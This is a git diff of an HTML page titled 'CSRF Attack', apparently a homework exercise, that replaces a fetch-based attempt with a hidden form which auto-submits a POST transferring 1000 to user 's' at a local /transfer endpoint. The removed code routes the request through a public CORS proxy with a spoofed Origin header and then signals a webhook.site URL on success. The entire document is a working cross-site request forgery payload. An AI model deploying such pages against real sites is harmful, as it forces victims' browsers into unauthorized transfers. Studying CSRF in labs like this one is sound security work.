--- a/index.html
+++ b/index.html
@@ -4,25 +4,12 @@
     <title>CSRF Attack</title>
 </head>
 <body>
+    <form action="http://127.0.0.1:8080/transfer" method="POST">
+        <input type="hidden" name="user_to" value="s" />
+        <input type="hidden" name="amount" value="1000" />
+    </form>
     <script>
-        // Send the POST request using CORS Anywhere as a proxy
-        fetch("https://cors-anywhere.herokuapp.com/http://127.0.0.1:8080/transfer", {
-            method: "POST",
-            headers: {
-                "Content-Type": "application/x-www-form-urlencoded",
-                "Origin": "https://mitchellzhou1.github.io/hw/" // Your attacker's origin
-            },
-            body: "user_to=s&amount=1"
-        })
-        .then(response => response.text())
-        .then(data => {
-            console.log("Request successful:", data);
-            // After a successful request, trigger the webhook
-            fetch("https://webhook.site/a6d320d6-cbaa-4b5c-b216-dfcf9036b541", {
-                method: "GET"
-            });
-        })
-        .catch(error => console.error("Error:", error));
+        document.forms[0].submit();
     </script>
 </body>
 </html>
